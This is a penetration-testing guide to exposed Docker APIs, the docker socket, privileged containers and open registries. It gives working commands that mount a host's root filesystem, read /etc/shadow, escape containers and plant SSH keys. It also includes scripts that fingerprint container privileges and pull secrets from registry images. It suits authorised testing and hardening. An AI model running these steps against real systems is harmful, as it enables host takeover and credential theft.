Docker - Port 2375,2376
Basic info
Docker is a widely used containerization platform that allows developers to package applications with their dependencies into isolated units. However, misconfigurations, exposed APIs, and poor access control practices can create serious security risks. This guide provides comprehensive techniques for Docker penetration testing, focusing on real-world attack vectors, privilege escalation, container escape, and host exploitation.
Identifying Docker in a Target Environment
Detecting Docker Services via Network Scanning
Docker’s remote API may be exposed on:
Port 2375 (unencrypted)
Port 2376 (TLS-encrypted)
Scan using Nmap:
Scan with Nmap (the docker-version NSE script fingerprints the engine API; http-docker-registry is for registries, which listen on 5000):

```bash
nmap -p 2375,2376 --script docker-version,http-title <target-ip>
```

Check for Docker API access:

```bash
curl http://<target-ip>:2375/containers/json
```

If you receive JSON output, the Docker API is exposed without authentication; a daemon with no running containers answers with an empty array rather than an error, so [] also confirms access. Port 2376 behaves the same when the daemon runs with --tls but not --tlsverify (encryption without client authentication); with --tlsverify the handshake fails unless you present a client certificate signed by the daemon's CA.
Exploiting Exposed Docker API
Listing Containers

```bash
curl http://<target-ip>:2375/containers/json
```

Running a New Container with the Host Filesystem Mounted

Create a container that binds the host's / to /host inside it. The Cmd must keep the container alive: a bare /bin/sh with no TTY and no stdin exits immediately, so request both.

```bash
curl -X POST http://<target-ip>:2375/containers/create -H "Content-Type: application/json" \
  -d '{"Image":"alpine", "Cmd":["/bin/sh"], "Tty":true, "OpenStdin":true, "HostConfig": {"Binds":["/:/host"]}}'
```

Then start it, using the Id from the create response:

```bash
curl -X POST http://<target-ip>:2375/containers/<container_id>/start
```

Run commands in it. The exec endpoint only creates an exec instance and returns its Id; nothing runs until you start that instance with a second request, which returns the command's output:

```bash
curl -X POST -H "Content-Type: application/json" \
  http://<target-ip>:2375/containers/<container_id>/exec \
  -d '{"AttachStdout": true, "AttachStderr": true, "Cmd": ["chroot", "/host", "cat", "/etc/shadow"]}'
curl -X POST -H "Content-Type: application/json" \
  http://<target-ip>:2375/exec/<exec_id>/start -d '{"Detach": false, "Tty": false}'
```

Every exec runs as root with the host's root filesystem under /host, so you can read and write any host file (shadow, sudoers, SSH keys, cron) and chroot /host gives a host shell. If create fails with "No such image", the daemon has to pull alpine first, which the API also allows without authentication.
Docker Socket Abuse (/var/run/docker.sock)
The Unix socket /var/run/docker.sock is the daemon's local API endpoint. Anyone who can write to it talks to the daemon as root, exactly as with an open port 2375, so a socket mounted into a container (a common pattern for CI runners and monitoring agents) is a host compromise waiting to happen.

Check access:

```bash
ls -la /var/run/docker.sock
```

Privilege Escalation via Docker Socket

If you have write access to docker.sock (typically as root or as a member of the docker group), create a container with the host filesystem mounted and chroot into it:

```bash
docker run -v /:/mnt --rm -it alpine chroot /mnt
```

This drops you into the host filesystem as root. Inside a container the docker binary is usually absent, but any HTTP client that can speak over a Unix socket works against the same API.
Container Escape Techniques
1. Privileged Containers

A container started with --privileged has every capability and sees the host's devices; the cgroup path in /proc/1/cgroup says nothing about that. Check the effective capability mask of your own process instead:

```bash
grep CapEff /proc/self/status
```

A default Docker container reports 00000000a80425fb (14 capabilities, no cap_sys_admin). An all-ones mask such as 0000003fffffffff or 000001ffffffffff (the width depends on the kernel) means full capabilities, including cap_sys_admin. With that and the host's block devices visible under /dev (sda, vda, nvme0n1 or similar), mount the host's root partition and chroot into it. The device name below is an example; take it from what you find in /dev:

```bash
mkdir -p /host
mount /dev/sda1 /host
mount -t proc proc /host/proc
chroot /host /bin/bash
```

2. Mounting Host Filesystems
Containers started with -v /:/mnt (or any bind mount of a sensitive host directory) give direct access to the host's root filesystem; /proc/self/mountinfo lists such binds. Escalate:

```bash
chroot /mnt
```

Then modify /etc/shadow or /etc/sudoers, or inject SSH keys into /root/.ssh/authorized_keys. The writes land on the host's disk, so they survive the container.
Detecting Docker Environment From Inside a Container

Check for a containerized environment:

```bash
grep -i docker /proc/1/cgroup
grep -q 'docker' /proc/self/cgroup && echo "Running in Docker"
```

On hosts using cgroup v2 (the default on current distributions) /proc/1/cgroup inside a container reads just 0::/, so this check gives a false negative; rely on the other indicators there. Look for environment variables:

```bash
env | grep -i docker
```

The presence of /.dockerenv, /docker-entrypoint.sh or /var/run/docker.sock, and a root filesystem mounted as overlay, are telltale signs.
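The following script is an added example, not code from the original page, and covers both the privileged-container check above and this section's container detection in one place: it decides whether the process is inside a container from the cgroup paths, the root mount type and /.dockerenv (with the cgroup v2 case where /proc/1/cgroup is only 0::/ reported as inconclusive rather than as a negative), and decodes CapEff from /proc/self/status into capability names to spot a --privileged container. Capability numbering follows linux/capability.h; the 0x00000000a80425fb default set is what Docker grants without --cap-add. The only assumption about the host is that main() can read the live /proc files; the checks themselves take text so they can be exercised on captured samples.

```python
"""Inside-the-container recon (added example): are we in a container, and are we privileged?"""
import os
import re

# Index = capability number from linux/capability.h.
CAPABILITIES = [
    "cap_chown", "cap_dac_override", "cap_dac_read_search", "cap_fowner", "cap_fsetid",
    "cap_kill", "cap_setgid", "cap_setuid", "cap_setpcap", "cap_linux_immutable",
    "cap_net_bind_service", "cap_net_broadcast", "cap_net_admin", "cap_net_raw",
    "cap_ipc_lock", "cap_ipc_owner", "cap_sys_module", "cap_sys_rawio", "cap_sys_chroot",
    "cap_sys_ptrace", "cap_sys_pacct", "cap_sys_admin", "cap_sys_boot", "cap_sys_nice",
    "cap_sys_resource", "cap_sys_time", "cap_sys_tty_config", "cap_mknod", "cap_lease",
    "cap_audit_write", "cap_audit_control", "cap_setfcap", "cap_mac_override",
    "cap_mac_admin", "cap_syslog", "cap_wake_alarm", "cap_block_suspend", "cap_audit_read",
    "cap_perfmon", "cap_bpf", "cap_checkpoint_restore",
]
DOCKER_DEFAULT_CAPEFF = 0x00000000A80425FB   # CapEff of a default Docker container
# Capabilities outside the default set that commonly turn into a host escape.
ESCAPE_CAPS = {"cap_sys_admin", "cap_sys_module", "cap_sys_rawio", "cap_sys_ptrace",
               "cap_dac_read_search", "cap_net_admin", "cap_sys_boot", "cap_bpf"}
CGROUP_RE = re.compile(r"/(docker|kubepods|containerd|libpod|lxc)")


def decode_capeff(hex_mask):
    """Map a CapEff hex string to capability names (bit i -> CAPABILITIES[i])."""
    mask = int(hex_mask, 16)
    names = [name for bit, name in enumerate(CAPABILITIES) if mask >> bit & 1]
    # Bits above the table belong to capabilities newer than this list; keep them visible.
    names += [f"cap_{bit}" for bit in range(len(CAPABILITIES), mask.bit_length()) if mask >> bit & 1]
    return names


def assess_caps(status_text):
    """Decode the CapEff line of /proc/self/status; an all-ones mask is what --privileged gives."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            hex_mask = line.split(":", 1)[1].strip()
            break
    else:
        raise ValueError("no CapEff line in status text")
    mask = int(hex_mask, 16)
    caps = set(decode_capeff(hex_mask))
    all_ones = mask != 0 and mask == (1 << mask.bit_length()) - 1
    return {
        "capeff": hex_mask,
        "default_docker_set": mask == DOCKER_DEFAULT_CAPEFF,
        "likely_privileged": all_ones and mask.bit_length() >= 38,   # full set on any recent kernel
        "escape_relevant": sorted(caps & ESCAPE_CAPS),
    }


def detect_container(cgroup_text, mountinfo_text="", dockerenv=False):
    """Return {'in_container': bool, 'evidence': [...], 'notes': [...]} from /proc contents."""
    evidence, notes = [], []
    for line in cgroup_text.splitlines():
        path = line.split(":", 2)[-1]          # hierarchy-ID:controllers:path
        match = CGROUP_RE.search(path)
        if match:
            evidence.append(f"cgroup path under /{match.group(1)}: {path}")
    if cgroup_text.strip() == "0::/":
        notes.append("cgroup v2 root view (0::/): seen inside containers and on some hosts, "
                     "so it proves nothing either way")
    for line in mountinfo_text.splitlines():
        left, _, right = line.partition(" - ")   # fields[4] is the mount point, right starts with fstype
        fields = left.split()
        if len(fields) > 4 and fields[4] == "/" and right.split()[:1] == ["overlay"]:
            evidence.append("root filesystem is an overlay mount")
    if dockerenv:
        evidence.append("/.dockerenv exists")
    return {"in_container": bool(evidence), "evidence": evidence, "notes": notes}


def main():
    def read(path):
        try:
            with open(path) as fh:
                return fh.read()
        except OSError:
            return ""
    print(detect_container(read("/proc/1/cgroup"), read("/proc/self/mountinfo"),
                           os.path.exists("/.dockerenv")))
    status = read("/proc/self/status")
    if status:
        print(assess_caps(status))


if __name__ == "__main__":
    main()
```

The overlay check is what rescues the cgroup v2 case: a container's root mount is almost always an overlay filesystem, whereas a host root is ext4, xfs or similar, and that shows in /proc/self/mountinfo regardless of cgroup version.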
Attacking Misconfigured Docker Registries
Discovering Registries
```bash
nmap -p 5000 --script http-title,http-docker-registry <target>
```

Access the registry. HTTP 200 with a repositories array means anonymous read access; 401 means credentials are required:

```bash
curl http://<target>:5000/v2/_catalog
```

List tags:

```bash
curl http://<target>:5000/v2/<image>/tags/list
```

Pull interesting images (for a plain-HTTP registry, add it to "insecure-registries" in /etc/docker/daemon.json first):

```bash
docker pull <target>:5000/<image>:<tag>
```

Analyze them locally for secrets or backdoors: environment variables and build history in the image config, credential files in the layers, and modified entrypoints. If the registry also accepts anonymous pushes, an image can be replaced with a backdoored one for every consumer that pulls it.
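As an added example, not code from the original page, the script below walks an anonymous-read registry with the v2 API (catalog, tags, manifest, image config blob) and flags credential-looking strings in each image's ENV and build history, which is the quickest first pass at "analyze for secrets" before pulling any layers. The registry URL is a placeholder, anonymous GET is assumed (a 401 on the catalog aborts), and the secret patterns are a starting point rather than a complete list.

```python
"""Enumerate a Docker registry over the v2 API and scan image configs for secrets (added example)."""
import json
import re
import sys
import urllib.error
import urllib.request

# Ask for schema-2 / OCI manifests; without this Accept header many registries fall
# back to the legacy schema-1 manifest, which has no config blob to read.
MANIFEST_ACCEPT = ", ".join([
    "application/vnd.docker.distribution.manifest.v2+json",
    "application/vnd.docker.distribution.manifest.list.v2+json",
    "application/vnd.oci.image.manifest.v1+json",
    "application/vnd.oci.image.index.v1+json",
])
SECRET_RE = re.compile(r"passw(?:or)?d|secret|token|api[_-]?key|access[_-]?key|private[_-]?key", re.I)


def get_json(base, path, accept=None):
    req = urllib.request.Request(base + path, headers={"Accept": accept} if accept else {})
    with urllib.request.urlopen(req, timeout=15) as resp:
        return json.load(resp)


def find_secrets(config):
    """Scan an image config JSON (the blob named by manifest['config']) for secret-like text."""
    hits = []
    for env in (config.get("config") or {}).get("Env") or []:
        if SECRET_RE.search(env):
            hits.append(("env", env))
    for entry in config.get("history") or []:
        created_by = entry.get("created_by", "")
        if SECRET_RE.search(created_by):
            hits.append(("history", created_by))
    return hits


def image_config(base, repo, ref):
    """Resolve tag -> manifest (-> first platform of a manifest list/index) -> config blob."""
    manifest = get_json(base, f"/v2/{repo}/manifests/{ref}", accept=MANIFEST_ACCEPT)
    if "manifests" in manifest:                      # manifest list / OCI index
        digest = manifest["manifests"][0]["digest"]
        manifest = get_json(base, f"/v2/{repo}/manifests/{digest}", accept=MANIFEST_ACCEPT)
    if "config" not in manifest:                     # schema-1 manifest: nothing to fetch
        return None
    return get_json(base, f"/v2/{repo}/blobs/{manifest['config']['digest']}")


def enumerate_registry(base):
    """Return {'repo:tag': [(where, text), ...]} for every image whose config has a hit."""
    try:
        repos = get_json(base, "/v2/_catalog").get("repositories") or []
    except urllib.error.HTTPError as exc:
        if exc.code == 401:
            raise SystemExit("registry requires authentication for /v2/_catalog")
        raise
    findings = {}
    for repo in repos:
        for tag in get_json(base, f"/v2/{repo}/tags/list").get("tags") or []:
            config = image_config(base, repo, tag)
            hits = find_secrets(config) if config else []
            if hits:
                findings[f"{repo}:{tag}"] = hits
    return findings


if __name__ == "__main__":
    # Placeholder target, e.g. http://<target>:5000
    base_url = sys.argv[1].rstrip("/") if len(sys.argv) > 1 else "http://<target>:5000"
    for image, hits in enumerate_registry(base_url).items():
        for where, text in hits:
            print(f"{image}\t{where}\t{text}")
```

Build history is worth scanning because an ARG or a RUN line that passed a credential on the command line is preserved verbatim in the config even when the file it wrote was later deleted in another layer.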
Privilege Escalation via Docker Group Membership
Membership in the docker group grants write access to /var/run/docker.sock, which is root-equivalent on the host. Check:

```bash
groups
```

If docker is listed, the user has full control over the host:

```bash
docker run -v /:/mnt --rm -it alpine chroot /mnt
```